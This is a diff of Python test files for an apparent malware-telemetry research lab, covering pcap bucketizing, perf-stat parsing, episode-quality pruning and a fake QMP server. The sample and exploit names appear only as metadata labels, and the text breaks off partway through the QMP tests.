|
||||
assert rows_written == 2
|
||||
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert len(persisted) == 2
|
||||
for orig, got in zip(rows_in, persisted):
|
||||
# Original guest timestamps preserved.
|
||||
assert got["t_guest_mono_ns"] == orig["t_guest_mono_ns"]
|
||||
# Host-clock fields added.
|
||||
assert "t_mono_ns" in got
|
||||
assert "t_wall_ns" in got
|
||||
assert got["source"] == "guest_agent"
|
||||
assert got["available_in_deployment"] is True
|
||||
|
||||
|
||||
def test_collector_returns_zero_when_socket_missing(tmp_path: Path) -> None:
|
||||
rows = guest_agent.run_loop(
|
||||
socket_path=tmp_path / "no-socket-here.sock",
|
||||
output_path=tmp_path / "out.jsonl",
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=threading.Event(),
|
||||
connect_timeout_s=0.5,
|
||||
)
|
||||
assert rows == 0
|
||||
|
||||
|
||||
def test_collector_drops_malformed_lines_but_keeps_going(tmp_path: Path) -> None:
|
||||
sock_path = tmp_path / "agent.sock"
|
||||
# Will be sent verbatim; the malformed line should be skipped.
|
||||
payload = (
|
||||
b'{"source":"guest_agent","mem_total_bytes":1}\n'
|
||||
b'this-is-not-json\n'
|
||||
b'{"source":"guest_agent","mem_total_bytes":2}\n'
|
||||
)
|
||||
|
||||
class Server(threading.Thread):
|
||||
def __init__(self) -> None:
|
||||
super().__init__(daemon=True)
|
||||
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
self._sock.bind(str(sock_path))
|
||||
self._sock.listen(1)
|
||||
|
||||
def run(self) -> None:
|
||||
conn, _ = self._sock.accept()
|
||||
try:
|
||||
conn.sendall(payload)
|
||||
time.sleep(0.2)
|
||||
finally:
|
||||
conn.close()
|
||||
self._sock.close()
|
||||
|
||||
s = Server()
|
||||
s.start()
|
||||
out_path = tmp_path / "out.jsonl"
|
||||
stop = threading.Event()
|
||||
threading.Thread(
|
||||
target=lambda: (time.sleep(0.4), stop.set()), daemon=True
|
||||
).start()
|
||||
rows = guest_agent.run_loop(
|
||||
socket_path=sock_path,
|
||||
output_path=out_path,
|
||||
t_mono_origin_ns=time.monotonic_ns(),
|
||||
stop_event=stop,
|
||||
connect_timeout_s=2.0,
|
||||
)
|
||||
s.join(timeout=2)
|
||||
assert rows == 2
|
||||
persisted = [json.loads(l) for l in out_path.read_text().splitlines()]
|
||||
assert [r["mem_total_bytes"] for r in persisted] == [1, 2]
|
||||
188
tests/test_pcap.py
Normal file
188
tests/test_pcap.py
Normal file
|
|
@ -0,0 +1,188 @@
|
|||
"""Tests for the pcap collector's pure-Python parser + bucketizer.
|
||||
|
||||
We synthesize a tiny pcap file in memory (Ethernet + IPv4 + TCP/UDP
|
||||
records with controlled timestamps), feed it to ``bucketize()``, and
|
||||
verify the produced netflow.jsonl rows are correct.
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import struct
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import pcap
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# pcap synthesis helpers
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
_PCAP_GLOBAL_HDR = struct.pack(
|
||||
"<IHHiIII",
|
||||
0xa1b2c3d4, # magic (us)
|
||||
2, 4, # version
|
||||
0, # thiszone
|
||||
0, # sigfigs
|
||||
65535, # snaplen
|
||||
1, # linktype = LINKTYPE_ETHERNET
|
||||
)
|
||||
|
||||
|
||||
def _ipv4(src: str, dst: str, proto: int, payload: bytes) -> bytes:
|
||||
s = bytes(int(x) for x in src.split("."))
|
||||
d = bytes(int(x) for x in dst.split("."))
|
||||
total_len = 20 + len(payload)
|
||||
return struct.pack(
|
||||
">BBHHHBBHII"[:0] + "BBHHHBBH",
|
||||
0x45, # version=4, IHL=5
|
||||
0, # tos
|
||||
total_len,
|
||||
0, 0, 64, proto,
|
||||
0, # checksum (don't care)
|
||||
) + s + d + payload
|
||||
|
||||
|
||||
def _tcp(sport: int, dport: int, flags: int) -> bytes:
|
||||
# Minimal 20-byte TCP header: sport, dport, seq, ack, off+flags, win, csum, urg
|
||||
return struct.pack(">HHIIBBHHH",
|
||||
sport, dport,
|
||||
0, 0,
|
||||
0x50, # data offset = 5 (no options)
|
||||
flags,
|
||||
0, 0, 0)
|
||||
|
||||
|
||||
def _udp(sport: int, dport: int, length: int = 8) -> bytes:
|
||||
return struct.pack(">HHHH", sport, dport, length, 0)
|
||||
|
||||
|
||||
def _ether(payload: bytes, ethertype: int = 0x0800) -> bytes:
|
||||
return b"\x02\x00\x00\x00\x00\x01" + b"\x02\x00\x00\x00\x00\x02" + struct.pack(">H", ethertype) + payload
|
||||
|
||||
|
||||
def _record(ts_ns: int, frame: bytes) -> bytes:
|
||||
sec = ts_ns // 1_000_000_000
|
||||
usec = (ts_ns // 1000) % 1_000_000
|
||||
return struct.pack("<IIII", sec, usec, len(frame), len(frame)) + frame
|
||||
|
||||
|
||||
def _build_pcap(records: list[tuple[int, bytes]]) -> bytes:
|
||||
out = bytearray(_PCAP_GLOBAL_HDR)
|
||||
for ts, frame in records:
|
||||
out += _record(ts, frame)
|
||||
return bytes(out)
|
||||
|
||||
|
||||
def _write_pcap(path: Path, records: list[tuple[int, bytes]]) -> None:
|
||||
path.write_bytes(_build_pcap(records))
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_iter_pcap_reads_records_back(tmp_path: Path) -> None:
|
||||
p = tmp_path / "a.pcap"
|
||||
frame = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
|
||||
_write_pcap(p, [(1_000_000_000, frame)])
|
||||
|
||||
records = list(pcap._iter_pcap(p))
|
||||
assert len(records) == 1
|
||||
t_ns, data = records[0]
|
||||
assert t_ns == 1_000_000_000
|
||||
assert data == frame
|
||||
|
||||
|
||||
def test_decode_tcp_syn() -> None:
|
||||
f = _ether(_ipv4("10.200.0.1", "10.200.0.10", 6, _tcp(40000, 21, flags=0x02)))
|
||||
d = pcap._decode(f)
|
||||
assert d["ethertype"] == 0x0800
|
||||
assert d["ip_proto"] == 6
|
||||
assert d["src_ip"] == "10.200.0.1"
|
||||
assert d["dst_ip"] == "10.200.0.10"
|
||||
assert d["src_port"] == 40000
|
||||
assert d["dst_port"] == 21
|
||||
assert d["tcp_flags"] & 0x02
|
||||
|
||||
|
||||
def test_decode_udp_dns_query() -> None:
|
||||
f = _ether(_ipv4("10.200.0.10", "10.200.0.1", 17, _udp(33333, 53)))
|
||||
d = pcap._decode(f)
|
||||
assert d["ip_proto"] == 17
|
||||
assert d["dst_port"] == 53
|
||||
|
||||
|
||||
def test_bucketize_collapses_per_window(tmp_path: Path) -> None:
|
||||
pcap_path = tmp_path / "ep.pcap"
|
||||
netflow_path = tmp_path / "netflow.jsonl"
|
||||
|
||||
bridge_ip = "10.200.0.1"
|
||||
guest_ip = "10.200.0.10"
|
||||
base_ns = 1_700_000_000_000_000_000 # arbitrary, aligned-friendly
|
||||
|
||||
records = [
|
||||
# Bucket A (0..100ms)
|
||||
(base_ns + 5_000_000,
|
||||
_ether(_ipv4(guest_ip, bridge_ip, 6, _tcp(40000, 21, flags=0x02)))),
|
||||
(base_ns + 9_000_000,
|
||||
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x12)))),
|
||||
# Bucket B (100..200ms): UDP DNS query
|
||||
(base_ns + 105_000_000,
|
||||
_ether(_ipv4(guest_ip, bridge_ip, 17, _udp(33333, 53)))),
|
||||
# Bucket B: TCP RST
|
||||
(base_ns + 199_000_000,
|
||||
_ether(_ipv4(bridge_ip, guest_ip, 6, _tcp(21, 40000, flags=0x04)))),
|
||||
]
|
||||
_write_pcap(pcap_path, records)
|
||||
|
||||
rows_written = pcap.bucketize(
|
||||
pcap_path, netflow_path,
|
||||
bucket_ms=100,
|
||||
t_mono_origin_ns=base_ns,
|
||||
bridge_ip=bridge_ip,
|
||||
)
|
||||
assert rows_written == 2
|
||||
|
||||
rows = [json.loads(l) for l in netflow_path.read_text().splitlines()]
|
||||
a, b = rows
|
||||
assert a["bucket_ms"] == 100
|
||||
# Bucket A: 1 in (SYN), 1 out (SYN-ACK)
|
||||
assert a["pkts_in"] == 1
|
||||
assert a["pkts_out"] == 1
|
||||
assert a["syn_count"] == 2
|
||||
assert a["tcp_new_flows"] == 1 # only the bare SYN counts as new flow
|
||||
assert a["dns_query_count"] == 0
|
||||
assert a["unique_dst_ips"] == 2
|
||||
|
||||
# Bucket B: DNS + RST
|
||||
assert b["dns_query_count"] == 1
|
||||
assert b["rst_count"] == 1
|
||||
|
||||
|
||||
def test_bucketize_returns_zero_for_missing_file(tmp_path: Path) -> None:
|
||||
rows = pcap.bucketize(
|
||||
tmp_path / "nope.pcap",
|
||||
tmp_path / "netflow.jsonl",
|
||||
bucket_ms=100,
|
||||
t_mono_origin_ns=0,
|
||||
)
|
||||
assert rows == 0
|
||||
|
||||
|
||||
def test_bucketize_handles_unknown_ethertype(tmp_path: Path) -> None:
|
||||
p = tmp_path / "x.pcap"
|
||||
netflow = tmp_path / "n.jsonl"
|
||||
# ARP frame (ethertype 0x0806) — counted but not decoded.
|
||||
f = _ether(b"\x00" * 28, ethertype=0x0806)
|
||||
_write_pcap(p, [(1_000_000_000, f)])
|
||||
rows = pcap.bucketize(p, netflow, bucket_ms=100, t_mono_origin_ns=0)
|
||||
assert rows == 1
|
||||
out = json.loads(netflow.read_text().splitlines()[0])
|
||||
# No IP info, but byte/packet count survives.
|
||||
assert out["pkts_in"] + out["pkts_out"] == 1
|
||||
assert out["tcp_count"] == 0
|
||||
82
tests/test_perf_qemu.py
Normal file
82
tests/test_perf_qemu.py
Normal file
|
|
@ -0,0 +1,82 @@
|
|||
"""Tests for the perf-stat collector — parser logic in isolation
|
||||
(no actual perf invocation, since perf needs CAP_SYS_ADMIN and
|
||||
hardware counters that the test runner can't assume)."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import perf_qemu
|
||||
|
||||
|
||||
def test_parse_event_line_extracts_fields() -> None:
|
||||
line = '{"interval":0.100123,"counter-value":"1234567","unit":"","event":"cycles"}'
|
||||
evt = perf_qemu.parse_perf_event_line(line)
|
||||
assert evt is not None
|
||||
assert evt["event"] == "cycles"
|
||||
assert evt["interval"] == 0.100123
|
||||
assert evt["counter-value"] == "1234567"
|
||||
|
||||
|
||||
def test_parse_event_line_skips_non_json() -> None:
|
||||
assert perf_qemu.parse_perf_event_line("") is None
|
||||
assert perf_qemu.parse_perf_event_line("garbage") is None
|
||||
assert perf_qemu.parse_perf_event_line("# Performance counter stats") is None
|
||||
|
||||
|
||||
def test_coerce_int_handles_perf_quirks() -> None:
|
||||
assert perf_qemu._coerce_int("1234567") == 1234567
|
||||
assert perf_qemu._coerce_int("1,234,567") == 1234567
|
||||
assert perf_qemu._coerce_int("<not counted>") is None
|
||||
assert perf_qemu._coerce_int("<not supported>") is None
|
||||
assert perf_qemu._coerce_int("") is None
|
||||
assert perf_qemu._coerce_int(None) is None
|
||||
assert perf_qemu._coerce_int(42) == 42
|
||||
|
||||
|
||||
def test_build_row_computes_ipc_and_miss_rate() -> None:
|
||||
agg = {
|
||||
"cycles": 1_000_000_000,
|
||||
"instructions": 660_000_000,
|
||||
"cache-references": 1_000_000,
|
||||
"cache-misses": 50_000,
|
||||
"branches": 100_000_000,
|
||||
"branch-misses": 5_000_000,
|
||||
"page-faults": 12,
|
||||
"context-switches": 20,
|
||||
}
|
||||
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||
assert row["source"] == "host_perf"
|
||||
assert row["available_in_deployment"] is False
|
||||
assert row["cycles"] == 1_000_000_000
|
||||
assert row["instructions"] == 660_000_000
|
||||
assert pytest.approx(row["ipc"], abs=1e-9) == 0.66
|
||||
assert pytest.approx(row["cache_miss_rate"], abs=1e-9) == 0.05
|
||||
assert row["interval_s"] == 0.1
|
||||
|
||||
|
||||
def test_build_row_handles_missing_counters() -> None:
|
||||
"""If perf can't enable cache-misses on this hardware, the row
|
||||
should still be valid — just with None for the missing fields."""
|
||||
agg = {"cycles": 100, "instructions": 50}
|
||||
row = perf_qemu._build_row(t_mono_origin_ns=0, interval_s=0.1, agg=agg)
|
||||
assert row["cycles"] == 100
|
||||
assert row["cache_misses"] is None
|
||||
assert row["cache_miss_rate"] is None
|
||||
assert pytest.approx(row["ipc"], abs=1e-9) == 0.5
|
||||
|
||||
|
||||
def test_run_loop_returns_zero_when_perf_missing(tmp_path: Path, monkeypatch) -> None:
|
||||
monkeypatch.setattr(perf_qemu, "perf_available", lambda: False)
|
||||
import threading
|
||||
rows = perf_qemu.run_loop(
|
||||
pid=1,
|
||||
output_path=tmp_path / "telemetry-perf.jsonl",
|
||||
t_mono_origin_ns=0,
|
||||
interval_ms=100,
|
||||
stop_event=threading.Event(),
|
||||
)
|
||||
assert rows == 0
|
||||
309
tests/test_prune.py
Normal file
309
tests/test_prune.py
Normal file
|
|
@ -0,0 +1,309 @@
|
|||
"""Tests for cis490-prune. Builds synthetic episode tarballs (each
|
||||
flagged with a specific quality issue) and confirms the classifier
|
||||
catches them. Then exercises the index-walk + dry-run / archive /
|
||||
delete actions on a temp tree so we don't touch real data."""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import io
|
||||
import json
|
||||
import shutil
|
||||
import subprocess
|
||||
import tarfile
|
||||
from pathlib import Path
|
||||
|
||||
import pytest
|
||||
|
||||
|
||||
# Skip the whole module if zstd isn't on PATH (the prune tool shells
|
||||
# out for decompression, mirroring the shipper).
|
||||
zstd_available = shutil.which("zstd") is not None
|
||||
pytestmark = pytest.mark.skipif(not zstd_available, reason="needs system zstd")
|
||||
|
||||
|
||||
import sys
|
||||
ROOT = Path(__file__).resolve().parent.parent
|
||||
sys.path.insert(0, str(ROOT / "tools"))
|
||||
import prune_episodes as pe # noqa: E402
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# tar+zstd builder
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _make_tar_zst(out_path: Path, files: dict[str, bytes]) -> None:
|
||||
"""Build a {episode_id}/<file> layout, tar it, zstd it."""
|
||||
raw_tar = io.BytesIO()
|
||||
with tarfile.open(fileobj=raw_tar, mode="w") as t:
|
||||
for name, data in files.items():
|
||||
info = tarfile.TarInfo(name=name)
|
||||
info.size = len(data)
|
||||
t.addfile(info, io.BytesIO(data))
|
||||
out_path.parent.mkdir(parents=True, exist_ok=True)
|
||||
raw_tmp = out_path.with_suffix(".tar")
|
||||
raw_tmp.write_bytes(raw_tar.getvalue())
|
||||
try:
|
||||
subprocess.check_call(
|
||||
["zstd", "-q", "-19", "--stdout", str(raw_tmp)],
|
||||
stdout=out_path.open("wb"),
|
||||
)
|
||||
finally:
|
||||
raw_tmp.unlink(missing_ok=True)
|
||||
|
||||
|
||||
def _meta(*, sample: dict | None = None, exploit: dict | None = None) -> bytes:
|
||||
return json.dumps({
|
||||
"episode_id": "01TEST",
|
||||
"schema_version": 1,
|
||||
"sample": sample,
|
||||
"exploit": exploit,
|
||||
"result": {"phases_observed": ["clean", "infected_running", "dormant"]},
|
||||
}, sort_keys=True).encode()
|
||||
|
||||
|
||||
def _events(rows: list[dict]) -> bytes:
|
||||
return ("\n".join(json.dumps(r, sort_keys=True) for r in rows) + "\n").encode()
|
||||
|
||||
|
||||
def _proc_rows(*, flat: bool, n: int = 80) -> bytes:
|
||||
"""Synthesize /proc rows with either flat-CPU (no phase signal)
|
||||
or sharply-spiking CPU (clear phase boundaries). The test labels
|
||||
file pairs with these."""
|
||||
out: list[dict] = []
|
||||
for i in range(n):
|
||||
t = i * 100_000_000
|
||||
if flat:
|
||||
jiff = 100 + i * 20 # uniform increment → flat CPU%
|
||||
else:
|
||||
# First third clean (low), middle infected (high), last third dormant (low).
|
||||
jiff = (
|
||||
100 + i * 20 if i < n // 3 or i >= 2 * n // 3
|
||||
else 100 + i * 1000 # huge jump for "infected"
|
||||
)
|
||||
out.append({
|
||||
"t_mono_ns": t,
|
||||
"cpu_user_jiffies": jiff,
|
||||
"cpu_sys_jiffies": 0,
|
||||
"rss_bytes": 1024 * 1024,
|
||||
})
|
||||
return ("\n".join(json.dumps(r) for r in out) + "\n").encode()
|
||||
|
||||
|
||||
def _labels(boundary_ns: list[int], names: list[str]) -> bytes:
|
||||
rows = [
|
||||
{"t_mono_ns": t, "phase": p, "prev": names[i - 1] if i else None}
|
||||
for i, (t, p) in enumerate(zip(boundary_ns, names))
|
||||
]
|
||||
return ("\n".join(json.dumps(r) for r in rows) + "\n").encode()
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Per-reason classifier tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _make_episode(tmp_path: Path, **member_overrides) -> Path:
|
||||
"""Default = a healthy episode with sample, exploit, workload events,
|
||||
sharp CPU envelope. Overrides replace specific members."""
|
||||
n = 60
|
||||
end_ns = n * 100_000_000
|
||||
members = {
|
||||
"01TEST/meta.json": _meta(
|
||||
sample={"name": "xmrig", "kind": "real", "family": "XMRig",
|
||||
"category": "cryptominer", "profile": "cpu-saturate",
|
||||
"sha256": "a" * 64},
|
||||
exploit={"module_name": "vsftpd_234_backdoor", "module": "x"},
|
||||
),
|
||||
"01TEST/events.jsonl": _events([
|
||||
{"event": "snapshot_load"},
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_started", "phase": "infected_running"},
|
||||
{"event": "workload_killed", "phase": "dormant",
|
||||
"pre_kill_probe": {"yes": "2", "loadavg": "1.4"}},
|
||||
{"event": "episode_end"},
|
||||
]),
|
||||
"01TEST/labels.jsonl": _labels(
|
||||
[0, n // 3 * 100_000_000, 2 * n // 3 * 100_000_000],
|
||||
["clean", "infected_running", "dormant"],
|
||||
),
|
||||
"01TEST/telemetry-proc.jsonl": _proc_rows(flat=False, n=n),
|
||||
}
|
||||
members.update(member_overrides)
|
||||
out = tmp_path / "01TEST.tar.zst"
|
||||
_make_tar_zst(out, members)
|
||||
return out
|
||||
|
||||
|
||||
def test_healthy_episode_has_no_reasons(tmp_path: Path) -> None:
|
||||
tar = _make_episode(tmp_path)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert q.reasons == [], f"unexpected reasons: {q.reasons}"
|
||||
assert q.sample_name == "xmrig"
|
||||
assert q.module_name == "vsftpd_234_backdoor"
|
||||
|
||||
|
||||
def test_no_sample_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/meta.json": _meta(sample=None, exploit=None)},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "no-sample" in q.reasons
|
||||
|
||||
|
||||
def test_no_workload_events_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "snapshot_load"},
|
||||
{"event": "phase_transition", "to": "clean"},
|
||||
{"event": "episode_end"},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "no-workload-events" in q.reasons
|
||||
|
||||
|
||||
def test_workload_failed_flag(tmp_path: Path) -> None:
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_failed", "phase": "infected_running",
|
||||
"error": "EOF on serial"},
|
||||
{"event": "episode_end"},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "workload-failed" in q.reasons
|
||||
|
||||
|
||||
def test_workload_silent_flag(tmp_path: Path) -> None:
|
||||
"""The elliott-lab fingerprint: dormant probe shows yes=0,
|
||||
meaning the workload never actually fired."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/events.jsonl": _events([
|
||||
{"event": "workload_setup"},
|
||||
{"event": "workload_started", "phase": "infected_running"},
|
||||
{"event": "workload_killed", "phase": "dormant",
|
||||
"pre_kill_probe": {"yes": "0", "loadavg": "0.18"}},
|
||||
])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "workload-silent" in q.reasons
|
||||
|
||||
|
||||
def test_flat_cpu_flag(tmp_path: Path) -> None:
|
||||
"""When the proc CPU% spread between phases is < 5pp, the episode
|
||||
has no signal for the trainer to learn from."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/telemetry-proc.jsonl": _proc_rows(flat=True, n=60)},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="lab1", episode_id="01TEST")
|
||||
assert "flat-cpu" in q.reasons
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Walk + actions
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def _stage_receiver_tree(tmp_path: Path) -> tuple[Path, Path]:
|
||||
"""Build a fake /var/lib/cis490 layout with two episodes: one
|
||||
healthy, one flagged for no-sample. Returns (episodes_root, index_path)."""
|
||||
episodes = tmp_path / "episodes"
|
||||
(episodes / "lab1").mkdir(parents=True)
|
||||
healthy = _make_episode(episodes / "lab1" / "01OK")
|
||||
healthy.rename(episodes / "lab1" / "01OK.tar.zst")
|
||||
bad = _make_episode(
|
||||
episodes / "lab1" / "01FAKE",
|
||||
**{"01TEST/meta.json": _meta(sample=None)},
|
||||
)
|
||||
bad.rename(episodes / "lab1" / "01FAKE.tar.zst")
|
||||
index = tmp_path / "index.jsonl"
|
||||
rows = [
|
||||
{"host_id": "lab1", "episode_id": "01OK"},
|
||||
{"host_id": "lab1", "episode_id": "01FAKE"},
|
||||
]
|
||||
index.write_text("\n".join(json.dumps(r) for r in rows) + "\n")
|
||||
return episodes, index
|
||||
|
||||
|
||||
def test_dry_run_does_not_modify_anything(tmp_path: Path, capsys) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
])
|
||||
# Returns 1 because flagged episodes exist (matches CLI exit semantics).
|
||||
assert rc == 1
|
||||
# Both tarballs still on disk.
|
||||
assert (episodes / "lab1" / "01OK.tar.zst").exists()
|
||||
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
# Index unchanged.
|
||||
assert len(index.read_text().splitlines()) == 2
|
||||
|
||||
|
||||
def test_archive_moves_flagged_and_rewrites_index(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
archive = tmp_path / "archive"
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--archive-root", str(archive),
|
||||
"--reason", "no-sample",
|
||||
"--archive",
|
||||
])
|
||||
assert rc == 1
|
||||
# 01OK kept.
|
||||
assert (episodes / "lab1" / "01OK.tar.zst").exists()
|
||||
# 01FAKE moved.
|
||||
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
assert (archive / "lab1" / "01FAKE.tar.zst").exists()
|
||||
# Index dropped the bad row.
|
||||
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
|
||||
assert len(rows) == 1
|
||||
assert rows[0]["episode_id"] == "01OK"
|
||||
|
||||
|
||||
def test_delete_removes_flagged_and_rewrites_index(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
"--delete",
|
||||
])
|
||||
assert rc == 1
|
||||
assert not (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
rows = [json.loads(l) for l in index.read_text().splitlines() if l.strip()]
|
||||
assert len(rows) == 1
|
||||
|
||||
|
||||
def test_host_filter_scopes_to_one_lab_host(tmp_path: Path) -> None:
|
||||
episodes, index = _stage_receiver_tree(tmp_path)
|
||||
rc = pe.main([
|
||||
"--episodes-root", str(episodes),
|
||||
"--index", str(index),
|
||||
"--reason", "no-sample",
|
||||
"--host", "lab2", # nothing matches
|
||||
])
|
||||
assert rc == 0 # zero flagged → exit 0
|
||||
assert (episodes / "lab1" / "01FAKE.tar.zst").exists()
|
||||
|
||||
|
||||
def test_multiple_reasons_combine(tmp_path: Path) -> None:
|
||||
"""An episode failing >1 signal is flagged once, all reasons listed."""
|
||||
tar = _make_episode(
|
||||
tmp_path,
|
||||
**{"01TEST/meta.json": _meta(sample=None),
|
||||
"01TEST/events.jsonl": _events([{"event": "snapshot_load"}])},
|
||||
)
|
||||
q = pe.classify_episode(tar, host_id="x", episode_id="01TEST")
|
||||
assert "no-sample" in q.reasons
|
||||
assert "no-workload-events" in q.reasons
|
||||
assert q.fake
|
||||
333
tests/test_qmp.py
Normal file
333
tests/test_qmp.py
Normal file
|
|
@ -0,0 +1,333 @@
|
|||
"""Tests for the QMP collector against an in-process fake QMP server.
|
||||
|
||||
The fake speaks just enough QMP to exercise:
|
||||
- the greeting + qmp_capabilities handshake
|
||||
- query-status
|
||||
- query-blockstats
|
||||
- query-stats target=vm
|
||||
- error responses
|
||||
- async events interleaved with command responses
|
||||
"""
|
||||
|
||||
from __future__ import annotations
|
||||
|
||||
import json
|
||||
import socket
|
||||
import tempfile
|
||||
import threading
|
||||
import time
|
||||
from pathlib import Path
|
||||
from typing import Any
|
||||
|
||||
import pytest
|
||||
|
||||
from collectors import qmp
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Fake QMP server
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
class FakeQMPServer(threading.Thread):
|
||||
"""Single-connection fake. Each line received from the client is
|
||||
parsed as JSON; we look up ``execute`` in ``responses`` and emit
|
||||
the configured reply. Optionally interleaves an async event before
|
||||
the response."""
|
||||
|
||||
def __init__(
|
||||
self,
|
||||
socket_path: Path,
|
||||
*,
|
||||
responses: dict[str, Any] | None = None,
|
||||
emit_event_before: set[str] | None = None,
|
||||
) -> None:
|
||||
super().__init__(daemon=True)
|
||||
self.socket_path = socket_path
|
||||
self.responses = responses or {}
|
||||
self.emit_event_before = emit_event_before or set()
|
||||
self.received: list[dict] = []
|
||||
self._stop = threading.Event()
|
||||
self._sock = socket.socket(socket.AF_UNIX, socket.SOCK_STREAM)
|
||||
self._sock.bind(str(socket_path))
|
||||
self._sock.listen(1)
|
||||
self._sock.settimeout(5.0)
|
||||
|
||||
def run(self) -> None:
|
||||
try:
|
||||
conn, _ = self._sock.accept()
|
||||
except socket.timeout:
|
||||
return
|
||||
conn.settimeout(5.0)
|
||||
try:
|
||||
# Greeting
|
||||
conn.sendall(b'{"QMP": {"version": {"qemu": {"major":9,"minor":0,"micro":0}}, "capabilities": []}}\n')
|
||||
buf = b""
|
||||
while not self._stop.is_set():
|
||||
try:
|
||||
chunk = conn.recv(4096)
|
||||
except socket.timeout:
|
||||
if self._stop.is_set():
|
||||
return
|
||||
continue
|
||||
if not chunk:
|
||||
return
|
||||
buf += chunk
|
||||
while b"\n" in buf:
|
||||
line, _, buf = buf.partition(b"\n")
|
||||
if not line.strip():
|
||||
continue
|
||||
msg = json.loads(line)
|
||||
self.received.append(msg)
|
||||
cmd = msg.get("execute")
|
||||
if cmd == "qmp_capabilities":
|
||||
conn.sendall(b'{"return": {}}\n')
|
||||
continue
|
||||
if cmd in self.emit_event_before:
|
||||
conn.sendall(b'{"event": "STOP", "timestamp": {"seconds": 1, "microseconds": 0}}\n')
|
||||
if cmd in self.responses:
|
||||
resp = self.responses[cmd]
|
||||
conn.sendall((json.dumps(resp) + "\n").encode())
|
||||
else:
|
||||
conn.sendall(b'{"error": {"class": "CommandNotFound", "desc": "unknown"}}\n')
|
||||
finally:
|
||||
conn.close()
|
||||
|
||||
def shutdown(self) -> None:
|
||||
self._stop.set()
|
||||
try:
|
||||
self._sock.close()
|
||||
except OSError:
|
||||
pass
|
||||
|
||||
|
||||
@pytest.fixture
|
||||
def qmp_server(tmp_path: Path):
|
||||
sock_path = tmp_path / "qmp.sock"
|
||||
return sock_path
|
||||
|
||||
|
||||
# ---------------------------------------------------------------------------
|
||||
# Client tests
|
||||
# ---------------------------------------------------------------------------
|
||||
|
||||
|
||||
def test_connect_negotiates_capabilities(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(qmp_server)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
greeting = client.connect()
|
||||
assert "version" in greeting
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
# Server saw exactly the qmp_capabilities call.
|
||||
assert any(m.get("execute") == "qmp_capabilities" for m in server.received)
|
||||
|
||||
|
||||
def test_execute_returns_payload(qmp_server: Path) -> None:
|
||||
server = FakeQMPServer(
|
||||
qmp_server,
|
||||
responses={
|
||||
"query-status": {"return": {"status": "running", "running": True}},
|
||||
},
|
||||
)
|
||||
server.start()
|
||||
try:
|
||||
client = qmp.QMPClient(qmp_server)
|
||||
client.connect()
|
||||
out = client.execute("query-status")
|
||||
assert out == {"status": "running", "running": True}
|
||||
finally:
|
||||
client.close()
|
||||
server.shutdown()
|
||||
|
||||
|
||||
def test_execute_skips_async_events_before_response(qmp_server: Path) -> None:
|
||||
